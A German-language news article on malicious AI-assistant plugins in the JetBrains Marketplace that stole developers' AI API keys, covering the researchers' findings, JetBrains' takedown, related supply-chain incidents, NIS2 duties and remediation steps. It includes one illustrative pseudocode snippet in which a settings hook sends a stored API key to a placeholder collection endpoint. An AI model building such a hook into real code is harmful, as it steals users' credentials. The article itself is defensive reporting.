Ein Sicherheitsvorfall sorgt derzeit für Unruhe unter Entwicklerinnen und Entwicklern, die mit JetBrains-IDEs wie IntelliJ IDEA, PyCharm oder WebStorm arbeiten. Mindestens 15 bösartige Erweiterungen im offiziellen JetBrains Marketplace haben monatelang unbemerkt API-Schlüssel für KI-Dienste abgegriffen, bevor die Sicherheitsfirma Aikido Security die Kampagne am 16. Juni 2026 öffentlich machte. Betroffen waren nach aktuellem Kenntnisstand Zugangsdaten für OpenAI, DeepSeek und SiliconFlow, die Angreifer über sieben verschiedene Marketplace-Konten verteilten. JetBrains reagierte nach eigenen Angaben binnen eines Tages mit Löschungen, Kontosperren und einem Fernabschalt-Mechanismus. Für Entwickler in Österreich und der gesamten DACH-Region ist der Fall mehr als eine Randnotiz: Er zeigt, wie leicht sich Vertrauen in eine Plugin-Plattform gegen die eigene Belegschaft wenden lässt, sobald KI-Tools zum Standard-Werkzeug im Alltag werden.

Der Angriff im Überblick: Was in der JetBrains Marketplace Sicherheitslücke geschah

Im Kern handelt es sich um eine klassische Supply-Chain-Attacke, die gezielt auf den KI-Boom in der Softwareentwicklung zugeschnitten war. Die Angreifer veröffentlichten über mehrere Monate hinweg Plugins, die sich als KI-Programmierhelfer ausgaben, teils mit Namen, die an DeepSeek oder an bekannte ChatGPT-Wrapper erinnerten. Wer eine dieser Erweiterungen installierte und in den Plugin-Einstellungen einen eigenen API-Schlüssel für einen KI-Anbieter hinterlegte, übergab diesen Schlüssel faktisch an die Angreifer. JetBrains bestätigte den Vorfall in einem eigenen Blogeintrag und schrieb, die Plugins hätten sich als legitime KI-Werkzeuge getarnt, um heimlich von Entwicklern konfigurierte API-Schlüssel für KI-Anbieter abzugreifen. Die Formulierung macht deutlich, dass es nicht um eine Schwachstelle in der IDE selbst ging, sondern um bewusst platzierte Schadsoftware innerhalb des Marketplace-Ökosystems.

Bemerkenswert ist der Zeitraum: Laut Auswertung von Aikido Security reichen die ersten verdächtigen Veröffentlichungen bis in den Oktober 2025 zurück, während das letzte identifizierte bösartige Plugin erst am 10. Juni 2026 hochgeladen wurde. Die Kampagne lief damit rund acht Monate lang, ohne dass die Marketplace-Prüfmechanismen von JetBrains sie stoppten. Das wirft zwangsläufig Fragen zur Wirksamkeit der bisherigen Review-Prozesse auf, die neu eingereichte Plugins vor der Veröffentlichung durchlaufen.

Die Zahlen im Detail: 15 Plugins, sieben Konten, rund 70.000 Installationen

Die konkreten Eckdaten des Vorfalls liefert vor allem Aikido Security, die Firma, die die Kampagne ursprünglich entdeckte. Nach ihrer Analyse waren mindestens 15 Plugins betroffen, veröffentlicht über sieben unterschiedliche Marketplace-Konten. Zusammengenommen kamen die Erweiterungen auf knapp 70.000 Installationen, wobei zwei besonders erfolgreiche Plugins jeweils mehr als 25.000 Downloads erreichten. Wichtig für die Einordnung: Diese Zahl misst Marketplace-Downloads, nicht die Zahl der Entwickler, die tatsächlich einen API-Schlüssel in die Einstellungen eingetragen haben. JetBrains selbst hat die 70.000er-Zahl bislang nicht unabhängig bestätigt, sie stammt aus der Aikido-Untersuchung.

KennzahlWert laut Sicherheitsforschung
Bösartige Pluginsmindestens 15
Publisher-Konten7
Kombinierte Installationenrund 70.000 (Aikido-Schätzung)
Downloads der zwei größten Pluginsjeweils über 25.000
Kampagnenzeitraumca. Oktober 2025 bis Juni 2026
Letzte bekannte Veröffentlichung10. Juni 2026
Öffentliche Aufdeckung16. Juni 2026 (Aikido Security)
Entfernung durch JetBrains16.–17. Juni 2026
Betroffene KI-Anbieter (bestätigt)OpenAI, DeepSeek, SiliconFlow

So funktionierte der Diebstahl der KI-API-Schlüssel

Die Angreifer setzten auf ein simples, aber wirksames Prinzip: Statt selbst in fremde Systeme einzudringen, ließen sie Entwickler ihre eigenen wertvollen Zugangsdaten freiwillig eingeben. Die Sicherheitsfirma StepSecurity beschreibt den Ablauf in ihrem technischen Bericht so: „In dem Moment, in dem ein Entwickler einen API-Schlüssel eines KI-Anbieters in die Plugin-Einstellungen eintrug und auf ‘Übernehmen’ klickte, wurde der Schlüssel unverschlüsselt per HTTP an einen fest im Code hinterlegten Command-and-Control-Server (C2) übermittelt”, so StepSecurity in ihrer Analyse. Die Übertragung erfolgte demnach unverschlüsselt, was zusätzlich das Risiko erhöhte, dass auch Dritte im selben Netzwerk die Schlüssel mitlesen konnten.

Die Technik hinter der Datenexfiltration

Aikido Security fasst das gemeinsame Verhalten der 15 Plugins so zusammen: „Mindestens 15 IDE-Plugins, veröffentlicht unter sieben Anbieterkonten, teilen sich dasselbe versteckte Verhalten”, schreibt Aikido Security in ihrem Blogbeitrag. An anderer Stelle konkretisiert das Unternehmen den Effekt: „Jedes einzelne exfiltriert den KI-Provider-API-Schlüssel, den man in seinen Einstellungen gespeichert hat, und zusammen wurden sie fast 70.000 Mal installiert.” Nachvollziehbare technische Details wie eine konkrete Server-IP-Adresse oder ein genauer Serverstandort wurden bislang nicht veröffentlicht, JetBrains beschreibt in der eigenen Nachbereitung lediglich, dass künftige Prüfungen gezielt nach rohen HTTP-Endpunkten, fest hinterlegten IP-Adressen und unautorisierter TLS-Abschwächung suchen sollen.

Welche KI-Anbieter betroffen waren

Nach übereinstimmenden Berichten zielte die Kampagne konkret auf API-Schlüssel für OpenAI, DeepSeek und SiliconFlow ab. Ein separates Sicherheits-Briefing nennt zusätzlich Anthropic und Cohere als mögliche Ziele, diese Angabe stammt jedoch nicht aus der offiziellen JetBrains-Stellungnahme und sollte daher mit Vorsicht behandelt werden. Für betroffene Entwickler bedeutet das in der Praxis: Jeder Schlüssel, der jemals in eines der 15 Plugins eingetragen wurde, muss als kompromittiert gelten, unabhängig davon, welcher Anbieter dahintersteht.

Zur Veranschaulichung des Ablaufs, den StepSecurity beschreibt, lässt sich der Exfiltrationsmechanismus stark vereinfacht so darstellen (rein illustrativ, ohne reale Server-Adressen):

// Vereinfachte, illustrative Darstellung des gemeldeten Ablaufs
onSettingsSaved(pluginConfig) {
  const apiKey = pluginConfig.aiProviderApiKey;
  // unverschlüsselte HTTP-Übertragung an fest hinterlegten Server
  http.post("http:///collect", {
    key: apiKey,
    provider: pluginConfig.providerName,
    timestamp: Date.now()
  });
}

Zeitleiste eines achtmonatigen Angriffs: Oktober 2025 bis Juni 2026

Die zeitliche Rekonstruktion zeigt, wie lange sich die Kampagne unter dem Radar bewegen konnte. Erste bösartige Plugins tauchten laut Aikido-Analyse bereits im Oktober 2025 auf. Über die folgenden Monate kamen weitere Varianten hinzu, das letzte bekannte Plugin wurde am 10. Juni 2026 veröffentlicht. Erst am 16. Juni 2026 meldete Aikido Security den Fund öffentlich, am selben Tag bestätigte JetBrains den Eingang entsprechender Sicherheitsberichte. In der eigenen Stellungnahme schreibt JetBrains: „Am 16. Juni 2026 erhielten unsere Teams Sicherheitsberichte über eine Kampagne zum Diebstahl von KI-API-Schlüsseln, die 15 Drittanbieter-Plugins auf dem JetBrains Marketplace betraf.” Innerhalb von etwa 24 Stunden, bis zum 17. Juni, waren nach Unternehmensangaben alle 15 Plugins entfernt und die zugehörigen sieben Konten dauerhaft gesperrt.

Diese Reaktionszeit ist im Branchenvergleich vergleichsweise schnell, ändert aber nichts an der Tatsache, dass die Kampagne acht Monate lang unentdeckt blieb. Für ein Marketplace-Ökosystem, das auf automatisierten und teils manuellen Prüfungen bei der Veröffentlichung basiert, ist das eine deutliche Lücke.

JetBrains reagiert: Löschung, Kontosperren und Kill-Switch

JetBrains beschreibt in seiner Stellungnahme ein mehrstufiges Vorgehen. Zunächst wurden alle 15 identifizierten Plugins aus dem Marketplace entfernt und künftige Downloads blockiert. Parallel dazu sperrte das Unternehmen die sieben zugehörigen Publisher-Konten dauerhaft. Besonders relevant für bereits betroffene Nutzer: JetBrains aktivierte einen serverseitigen Fernabschalt-Mechanismus, der die bösartigen Plugins bei jedem Neustart der IDE automatisch deaktiviert, auch wenn sie lokal bereits installiert waren. Zusätzlich kündigte das Unternehmen an, die Marketplace-Prüfung zu verschärfen und künftig gezielt nach rohen HTTP-Verbindungen, hartcodierten IP-Adressen und Versuchen zur TLS-Abschwächung zu suchen, wie es in der eigenen Aufarbeitung heißt.

Wörtlich beschreibt JetBrains die Vorgehensweise der Angreifer so: „Diese Plugins gaben sich als legitime KI-Werkzeuge aus, um heimlich von Entwicklern konfigurierte API-Schlüssel für KI-Anbieter abzugreifen”, heißt es im offiziellen Blogbeitrag. Das Unternehmen rät allen Nutzern, die vor dem 17. Juni 2026 eines der betroffenen Plugins installiert oder verwendet haben, sämtliche dort eingetragenen API-Schlüssel als kompromittiert zu betrachten und umgehend zu widerrufen beziehungsweise neu auszustellen. Reine Entfernung des Plugins reicht laut JetBrains nicht aus, da ein bereits abgeflossener Schlüssel dadurch nicht ungültig wird.

Wer deckte den Angriff auf? Aikido Security und StepSecurity im Fokus

Zwei auf Software-Lieferketten spezialisierte Sicherheitsfirmen haben den Fall öffentlich gemacht und unabhängig voneinander analysiert. Aikido Security identifizierte das gemeinsame Schadverhalten der 15 Plugins zuerst und veröffentlichte am 16. Juni 2026 die Details, inklusive der Installationszahlen und der Liste der betroffenen Publisher-Konten. StepSecurity lieferte parallel eine technische Tiefenanalyse der Exfiltrationsmethode und ergänzte eigene Empfehlungen für Unternehmenskunden, die ihre Entwicklerumgebungen überwachen. Beide Firmen bestätigen unabhängig voneinander den Kern der Geschichte: 15 Plugins, sieben Konten, ein gemeinsames Diebstahlmuster für KI-API-Schlüssel. Diese Doppelbestätigung durch zwei unterschiedliche Sicherheitsanbieter erhöht die Verlässlichkeit der gemeldeten Zahlen deutlich, auch wenn JetBrains selbst nur die 15/7-Kennzahlen, nicht aber die konkrete Installationszahl bestätigt hat.

Kein Einzelfall: Die Angriffsfläche der KI-Entwicklertools wächst

Der JetBrains-Vorfall reiht sich in eine wachsende Liste von Angriffen auf die Software-Lieferkette rund um KI-gestützte Entwicklertools ein. Besonders auffällig ist der zeitliche Zusammenhang mit dem Vorfall rund um die VS-Code-Erweiterung Nx Console: Im Mai 2026 wurde die Version 18.95.0 der legitimen Erweiterung nrwl.angular-console kompromittiert, die zu diesem Zeitpunkt mehr als 2 Millionen Installationen zählte. Laut dem offiziellen Postmortem-Bericht war ein kompromittierter Mitarbeiter-Rechner die Ursache, in der Folge wurden rund 3.800 interne Quellcode-Repositories abgezogen. Die Cloud Security Alliance ordnet beide Fälle, JetBrains und Nx Console, gemeinsam mit der sogenannten GlassWorm-Kampagne als Belege dafür ein, dass IDE-Plugin-Ökosysteme zu einer der zentralen Angriffsflächen für den Diebstahl von KI-Zugangsdaten geworden sind.

In einer breiter angelegten Untersuchung identifiziert die Cloud Security Alliance sechs unterschiedliche Angriffskategorien gegen KI-Entwicklerwerkzeuge: bösartige IDE-Erweiterungen, gefälschte KI-Tool-Installer über Malvertising, kompromittierte Paket-Ökosysteme, die gezielt die Markenbekanntheit von KI-Tools ausnutzen, sogenanntes „Slopsquatting” (Pakete, die Namen imitieren, die Sprachmodelle beim Generieren von Code fälschlich halluzinieren), Remote-Code-Execution-Schwachstellen in KI-Coding-Assistenten sowie kompromittierte Infrastruktur rund um das Model Context Protocol. Nach Angaben der Cloud Security Alliance waren bei einer breiter gefassten Kampagne über Open VSX, npm, PyPI und manipulierte GitHub-Pushes hinweg bereits mindestens 35.000 Entwicklerinstallationen betroffen, wobei diese Zahl nicht einfach mit den rund 70.000 JetBrains-Installationen addiert werden sollte, da beide Erhebungen unterschiedliche Grundgesamtheiten messen könnten.

VorfallZeitpunktAusmaß
JetBrains-Marketplace-KampagneOkt. 2025 – Juni 202615 Plugins, 7 Konten, ~70.000 Installationen
Nx-Console-KompromittierungMai 2026Version 18.95.0, >2 Mio. Installationen, ~3.800 abgezogene Repositories
Breitere KI-Toolchain-Kampagne (CSA)bis Juni 2026mind. 35.000 kompromittierte Entwicklerinstallationen über Open VSX, npm, PyPI, GitHub

Marktvergleich: JetBrains Marketplace, VS Code Marketplace und Open VSX im Sicherheitscheck

Alle drei großen Erweiterungs-Ökosysteme für Entwicklerwerkzeuge, der JetBrains Marketplace, der Microsoft VS Code Marketplace und das offene Open-VSX-Register, verfolgen im Kern ein ähnliches Modell: Drittanbieter können frei Erweiterungen einreichen, eine automatisierte Prüfung filtert offensichtlich bösartigen Code heraus, menschliche Reviews finden nur stichprobenartig statt. Der JetBrains-Vorfall zeigt, dass dieses Modell bei gezielten, gut getarnten Kampagnen versagen kann, wenn der Schadcode erst nach der Installation aktiv wird und auf freiwillig eingegebene Zugangsdaten wartet, statt selbst aktiv Schwachstellen auszunutzen. Der Nx-Console-Fall beim VS-Code-Ökosystem zeigt eine andere Angriffsvariante: Dort wurde nicht ein neues bösartiges Plugin eingeschleust, sondern eine bereits etablierte, vertrauenswürdige Erweiterung über einen kompromittierten internen Zugang manipuliert.

Für Entwickler bedeutet das in der Praxis, dass weder ein geschlossenes noch ein offenes Marketplace-Modell allein ausreichend Schutz bietet. Entscheidend ist vielmehr, wie schnell ein Anbieter auf Meldungen reagiert und wie transparent er über Umfang und Auswirkungen kommuniziert. JetBrains hat mit der Reaktionszeit von rund 24 Stunden zwischen erster Meldung und Entfernung aller Plugins in dieser Hinsicht vergleichsweise gut abgeschnitten, auch wenn die achtmonatige unentdeckte Laufzeit der Kampagne selbst ein Problem bleibt.

Wirtschaftliche und reputative Folgen für JetBrains

Unmittelbare finanzielle Kennzahlen zu den Folgen des Vorfalls hat JetBrains bislang nicht veröffentlicht, ein börsennotiertes Unternehmen mit entsprechender Berichtspflicht ist die tschechisch-US-amerikanische Firma ohnehin nicht. Der eigentliche Schaden dürfte weniger in unmittelbaren Kosten liegen als im Vertrauen, das Unternehmen und Einzelentwickler in den Marketplace als Vertriebskanal für Erweiterungen setzen. JetBrains positioniert seine IDEs seit Jahren stark im professionellen und Enterprise-Umfeld, gerade dort spielt die Frage, ob Drittanbieter-Erweiterungen ausreichend geprüft werden, eine zentrale Rolle bei Kaufentscheidungen und internen Sicherheitsrichtlinien großer Organisationen.

Mittelfristig ist denkbar, dass Unternehmen striktere interne Whitelists für zulässige Plugins einführen oder den Zugriff auf den öffentlichen Marketplace für Entwicklerteams stärker einschränken. Das würde zwar die Angriffsfläche verkleinern, gleichzeitig aber einen Teil des Werts schmälern, den ein offenes Erweiterungs-Ökosystem eigentlich bieten soll: schnellen Zugang zu neuen, von der Community entwickelten Werkzeugen.

Regulatorische Dimension: Lieferkettenpflichten für Unternehmen in Österreich

Für österreichische Unternehmen, die unter den Anwendungsbereich der NIS2-Richtlinie beziehungsweise ihrer nationalen Umsetzung fallen, ist ein Vorfall wie die JetBrains-Marketplace-Kampagne nicht nur ein technisches, sondern auch ein aufsichtsrechtliches Thema. Die Richtlinie verlangt von betroffenen Betrieben ausdrücklich Maßnahmen zum Management von Risiken in der Software-Lieferkette, wozu auch Entwicklerwerkzeuge und deren Erweiterungen zählen. Die OWASP-Stiftung hat Software-Supply-Chain-Schwächen inzwischen als eigene Kategorie in ihre Top-10-Liste kritischer Sicherheitsrisiken aufgenommen, was den Stellenwert des Themas in der Fachcommunity unterstreicht.

Für IT-Abteilungen bedeutet das konkret: Die Installation von Drittanbieter-Plugins in Entwicklungsumgebungen sollte dokumentiert und im Rahmen des Risikomanagements erfasst werden, nicht als rein individuelle Entscheidung einzelner Entwickler behandelt werden. Wer im regulierten Umfeld arbeitet, etwa in der Finanzbranche oder bei kritischer Infrastruktur, muss den JetBrains-Fall im Zweifel auch als meldepflichtiges Sicherheitsereignis prüfen, sofern eigene API-Schlüssel oder Kundendaten betroffen sein könnten.

Was Entwickler in Österreich und der DACH-Region jetzt tun sollten

Wer eine JetBrains-IDE mit Drittanbieter-Plugins nutzt, sollte den Vorfall zum Anlass nehmen, die eigene Plugin-Liste zu überprüfen. Besonders relevant ist das für Teams, die zwischen Oktober 2025 und Juni 2026 neue KI-bezogene Erweiterungen installiert haben. Die folgende Checkliste fasst die wichtigsten Schritte zusammen.

MaßnahmeWarum sie wichtig ist
Installierte Plugins prüfenAbgleich mit der von JetBrains und Aikido veröffentlichten Liste betroffener Erweiterungen
Alle in Plugins eingetragenen API-Schlüssel widerrufenEntfernen des Plugins allein macht bereits abgeflossene Schlüssel nicht ungültig
Neue API-Schlüssel ausstellen und Berechtigungen minimal haltenReduziert den Schaden, falls ein neuer Schlüssel künftig doch abfließt
Abrechnungs- und Nutzungsprotokolle der KI-Anbieter kontrollierenUngewöhnliche Nutzung kann auf bereits erfolgten Missbrauch hindeuten
Netzwerkverkehr von IDE-Plugins überwachenUnverschlüsselte HTTP-Verbindungen zu unbekannten Zielen sind ein Warnsignal
Plugin-Installationen zentral dokumentierenErleichtert künftige Risikobewertungen und regulatorische Nachweise

Historischer Kontext: IDE-Erweiterungen als Angriffsvektor seit 2023

Bösartige IDE-Erweiterungen sind kein neues Phänomen, der aktuelle Fall ist aber insofern bemerkenswert, als er gezielt den KI-Boom als Köder nutzt. Bereits seit 2023 tauchten in verschiedenen Marketplace-Ökosystemen immer wieder gefälschte Erweiterungen auf, die sich als beliebte Tools ausgaben, um Zugangsdaten, Umgebungsvariablen oder Krypto-Wallets abzugreifen. Neu am JetBrains-Fall ist die Fokussierung auf KI-Provider-Schlüssel als eigenständige, wertvolle Angriffsziel-Kategorie. Weil diese Schlüssel oft mit nutzungsbasierter Abrechnung verknüpft sind, können Angreifer sie nicht nur für Datendiebstahl, sondern auch für kostenpflichtigen Missbrauch auf Rechnung des ursprünglichen Kontoinhabers verwenden.

Der Nx-Console-Vorfall vom Mai 2026 zeigt zudem, dass selbst etablierte, seit Jahren vertrauenswürdige Erweiterungen kein verlässlicher Schutz sind, sobald Angreifer den Zugang eines internen Mitarbeiters kompromittieren können. Beide Fälle zusammen deuten darauf hin, dass sich Angreifer 2025 und 2026 zunehmend von klassischen Netzwerk- und Server-Angriffen hin zu den Werkzeugen verlagern, die Entwickler täglich freiwillig auf ihren eigenen Rechnern installieren.

Stimmen aus der Sicherheitsbranche

Die technischen Details des Vorfalls stammen im Wesentlichen von zwei spezialisierten Anbietern. Aikido Security beschreibt das Kernproblem so: „Mindestens 15 IDE-Plugins, veröffentlicht unter sieben Anbieterkonten, teilen sich dasselbe versteckte Verhalten”, heißt es in der Analyse des Unternehmens. StepSecurity ergänzt die technische Perspektive mit dem Hinweis, dass die Übertragung „unverschlüsselt per HTTP an einen fest im Code hinterlegten Command-and-Control-Server” erfolgte, wie es im Bericht von StepSecurity heißt. JetBrains selbst bestätigt in der eigenen Nachbereitung den Erhalt der Meldungen am 16. Juni 2026 und beschreibt die Vorgehensweise der Angreifer als Tarnung legitimer KI-Werkzeuge zum heimlichen Abgreifen von API-Schlüsseln. Diese drei Quellen ergänzen sich zu einem konsistenten Bild: ein monatelang unentdeckter, gezielt auf KI-Zugangsdaten ausgerichteter Angriff auf ein etabliertes Marketplace-Ökosystem.

Prognosen: Wie es mit der Sicherheit von KI-Plugins weitergeht

Auf Basis der vorliegenden Fakten lassen sich mehrere Entwicklungen für die kommenden Monate absehen. Erstens dürfte JetBrains die angekündigten technischen Kontrollen, insbesondere die automatisierte Erkennung roher HTTP-Endpunkte und hartcodierter IP-Adressen, in den kommenden Wochen tatsächlich in den regulären Review-Prozess integrieren, da das Unternehmen dies bereits öffentlich angekündigt hat. Zweitens ist zu erwarten, dass auch Microsoft und die Open-VSX-Community ihre eigenen Prüfmechanismen als Reaktion auf den kombinierten Druck aus JetBrains- und Nx-Console-Vorfall überarbeiten, allein um Vergleichen in der Fachpresse zuvorzukommen.

Drittens wird die Zahl vergleichbarer Kampagnen mit hoher Wahrscheinlichkeit weiter steigen, solange KI-API-Schlüssel als eigenständige, monetarisierbare Ressource gelten und Entwickler sie routinemäßig in Drittanbieter-Tools eintragen. Viertens dürfte die Debatte um verpflichtende Offenlegung von Netzwerkverbindungen einzelner Plugins in Marketplace-Beschreibungen an Fahrt aufnehmen, ähnlich den bereits existierenden Berechtigungsanzeigen bei mobilen Apps. Fünftens ist davon auszugehen, dass größere Unternehmen ihre internen Richtlinien für die Installation von IDE-Erweiterungen verschärfen und stärker auf zentral verwaltete Whitelists umstellen, gerade in regulierten Branchen und im NIS2-Anwendungsbereich.

Häufig gestellte Fragen

Welche JetBrains-IDEs waren von der Sicherheitslücke betroffen?
Betroffen war der JetBrains Marketplace als zentrale Plattform für Drittanbieter-Plugins, die von allen JetBrains-Produkten wie IntelliJ IDEA, PyCharm, WebStorm oder Rider genutzt wird. Die konkreten bösartigen Plugins waren als KI-Erweiterungen getarnt und damit potenziell in jeder JetBrains-IDE installierbar.

Wie erkenne ich, ob ich ein betroffenes Plugin installiert habe?
JetBrains und Aikido Security haben die Namen der 15 betroffenen Plugins veröffentlicht. Ein Abgleich der eigenen installierten Erweiterungen mit dieser Liste ist der erste Schritt, zusätzlich sollten alle KI-bezogenen Plugins aus dem Zeitraum Oktober 2025 bis Juni 2026 besonders kritisch geprüft werden.

Reicht es, das bösartige Plugin zu deinstallieren?
Nein. JetBrains weist ausdrücklich darauf hin, dass die Deinstallation eines Plugins bereits abgeflossene API-Schlüssel nicht ungültig macht. Betroffene Schlüssel müssen beim jeweiligen KI-Anbieter aktiv widerrufen und durch neue ersetzt werden.

Welche KI-Anbieter waren konkret betroffen?
Bestätigt sind API-Schlüssel für OpenAI, DeepSeek und SiliconFlow. Ein zusätzliches Sicherheits-Briefing nennt außerdem Anthropic und Cohere, diese Angabe ist bislang nicht Teil der offiziellen JetBrains-Bestätigung.

Wie unterscheidet sich der JetBrains-Fall vom Nx-Console-Vorfall?
Beim JetBrains-Marketplace wurden von Grund auf neue, bösartige Plugins veröffentlicht. Beim Nx-Console-Vorfall im Mai 2026 wurde dagegen eine bereits etablierte, vertrauenswürdige Erweiterung mit über 2 Millionen Installationen über einen kompromittierten internen Zugang manipuliert.

Was sollten Unternehmen in Österreich jetzt tun?
Unternehmen, die unter die NIS2-Richtlinie beziehungsweise das österreichische NISG fallen, sollten den Vorfall im Rahmen ihres Lieferketten-Risikomanagements dokumentieren, betroffene Systeme identifizieren und prüfen, ob eine Meldepflicht gegenüber Aufsichtsbehörden besteht, falls eigene Kunden- oder Geschäftsdaten betroffen sein könnten.

Wie hat JetBrains auf den Vorfall reagiert?
JetBrains entfernte alle 15 identifizierten Plugins, sperrte die sieben zugehörigen Publisher-Konten dauerhaft und aktivierte einen Fernabschalt-Mechanismus, der betroffene Installationen automatisch deaktiviert. Zusätzlich kündigte das Unternehmen strengere technische Prüfungen für künftige Plugin-Einreichungen an.

Ist der JetBrains Marketplace jetzt grundsätzlich unsicherer als der VS Code Marketplace?
Nein, beide Ökosysteme haben 2026 eigene Vorfälle erlebt, JetBrains mit gezielt eingeschleusten neuen Plugins, das VS-Code-Umfeld mit dem kompromittierten Nx-Console-Update. Keines der beiden Modelle bietet vollständigen Schutz, entscheidend ist die Reaktionsgeschwindigkeit nach Bekanntwerden eines Vorfalls.